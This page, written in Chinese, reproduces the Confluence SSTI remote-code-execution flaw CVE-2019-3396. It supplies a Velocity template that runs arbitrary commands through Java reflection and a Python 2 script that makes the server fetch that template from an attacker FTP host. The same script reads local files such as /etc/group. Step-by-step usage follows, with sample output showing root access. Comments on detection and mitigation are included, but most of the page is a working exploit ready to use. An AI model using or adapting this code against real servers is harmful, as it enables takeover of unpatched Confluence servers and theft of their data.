CVE-2019-3396 Confluence SSTI RCE
1、把如下代码保存成cmd.vm 放在服务器上,可以使用https协议和ftp协议。 http不行。
## Velocity template that the Confluence widget macro loads from the
## caller-supplied `_template` parameter (CVE-2019-3396). Template code can
## reach Java reflection through `$e.getClass()`, so any template fetched
## from a location the caller chooses runs with the privileges of the
## Confluence process; `$cmd` below is the `cmd` macro parameter from the
## request body.
## Mitigation: apply the vendor fix for CVE-2019-3396.
## Detection: outbound ftp/https fetches of a `.vm` file by the Confluence
## host, correlated with POST /rest/tinymce/1/macro/preview requests whose
## macro params carry `_template` (and here also `cmd`).
#set ($e="exp")
#set ($a=$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec($cmd))
#set ($input=$e.getClass().forName("java.lang.Process").getMethod("getInputStream").invoke($a))
#set($sc = $e.getClass().forName("java.util.Scanner"))
#set($constructor = $sc.getDeclaredConstructor($e.getClass().forName("java.io.InputStream")))
#set($scan=$constructor.newInstance($input).useDelimiter("\\A"))
## Emit the captured output into the rendered preview; the client-side
## script scrapes it from the `wiki-content` div.
#if($scan.hasNext())
$scan.next()
#end
2、修改exp里面filename路径如: filename = 'ftp://1.1.1.1/cmd.vm'
(使用 python -m pyftpdlib -p 21)
# -*- coding: utf-8 -*-
import re
import sys
import requests
def _read(url):
    """Request a macro preview whose ``_template`` points at a local file URL.

    Sends ``POST {url}/rest/tinymce/1/macro/preview`` with a widget-macro JSON
    body whose ``_template`` is ``file:////etc/group`` and returns the text
    captured from the rendered ``wiki-content`` div. When the response is not
    200 or lacks that marker the function falls off the end and returns
    ``None``.

    Args:
        url: Base URL of the Confluence instance, without a trailing slash
            (it is concatenated directly with the endpoint path).

    Returns:
        The first regex capture from the rendered page, or ``None``.

    Raises:
        IndexError: the marker was present but the regex captured nothing.

    Defender notes (CVE-2019-3396): the stable request-side indicators are the
    ``_template`` key inside the macro ``params`` and a ``file:`` or remote
    URL as its value. The fixed ``draftShareId`` in the Referer and the
    Firefox 60 User-Agent are identical in both functions of this script and
    can be matched in proxy/WAF logs. Mitigation is the vendor fix for
    CVE-2019-3396.
    """
    result = {}  # unused; left as in the original
    # filename = "../web.xml"
    filename = 'file:////etc/group'  # template location handed to the server
    paylaod = url + "/rest/tinymce/1/macro/preview"  # vulnerable preview endpoint (sic: variable name)
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0",
        "Referer": url + "/pages/resumedraft.action?draftId=12345&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&",
        "Content-Type": "application/json; charset=utf-8"
    }
    # JSON built by %-formatting; `filename` is substituted into `_template`.
    data = '{"contentId":"12345","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"%s"}}}' % filename
    r = requests.post(paylaod, data=data, headers=headers)
    # print r.content
    if r.status_code == 200 and "wiki-content" in r.text:
        # re.S makes `.` span newlines; the greedy `.*` captures everything
        # between the div opening and the last matching `</div>` line.
        m = re.findall('.*wiki-content">\n(.*)\n </div>\n', r.text, re.S)
        return m[0]
def _exec(url,cmd):
    """Request a macro preview whose ``_template`` points at the remote ``cmd.vm``.

    Sends ``POST {url}/rest/tinymce/1/macro/preview`` with a widget-macro JSON
    body whose ``_template`` is the ``ftp://1.1.1.1/cmd.vm`` placeholder from
    step 2 of the page and whose extra ``cmd`` param is ``cmd``; the template
    reads it as ``$cmd``. Returns the text captured from the rendered
    ``wiki-content`` div, or ``None`` when the response is not 200 or lacks
    that marker.

    Args:
        url: Base URL of the Confluence instance, without a trailing slash.
        cmd: Value placed in the ``cmd`` macro parameter; it is inserted into
            the JSON body by %-formatting without any escaping.

    Returns:
        The first regex capture from the rendered page, or ``None``.

    Raises:
        IndexError: the marker was present but the regex captured nothing.

    Defender notes (CVE-2019-3396): request-side indicators are a ``cmd`` key
    next to ``_template`` in the macro ``params`` and an ``ftp://`` or
    ``https://`` value for ``_template``; host-side, an outbound FTP/HTTPS
    fetch of a ``.vm`` file by the Confluence process. Mitigation is the
    vendor fix for CVE-2019-3396.
    """
    result = {}  # unused; left as in the original
    filename = "ftp://1.1.1.1/cmd.vm"  # placeholder host; the page's step 2 says to edit it
    paylaod = url + "/rest/tinymce/1/macro/preview"  # vulnerable preview endpoint (sic: variable name)
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0",
        "Referer": url + "/pages/resumedraft.action?draftId=12345&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&",
        "Content-Type": "application/json; charset=utf-8"
    }
    # JSON built by %-formatting; both substitutions are unescaped.
    data = '{"contentId":"12345","macro":{"name":"widget","body":"","params":{"url":"http://www.dailymotion.com/video/xcpa64","width":"300","height":"200","_template":"%s","cmd":"%s"}}}' % (filename,cmd)
    r = requests.post(paylaod, data=data, headers=headers)
    # print r.content
    if r.status_code == 200 and "wiki-content" in r.text:
        # re.S makes `.` span newlines; greedy capture up to the last
        # matching `</div>` line.
        m = re.findall('.*wiki-content">\n(.*)\n </div>\n', r.text, re.S)
        return m[0]
if __name__ == '__main__':
    # Two positional arguments (base URL, command); there is no argc check,
    # so a missing argument raises IndexError.
    url = sys.argv[1]
    cmd = sys.argv[2]
    # Python 2 print statement: this script is not valid Python 3 syntax.
    print _exec(url,cmd)
3、执行python REC_exp.py http://test.wiki_test.cc:8080 "whoami"
例如:
$ python REC_exp.py http://test.wiki_test.cc:8080 "id"
uid=0(root) gid=0(root) groups=0(root)
复现
参考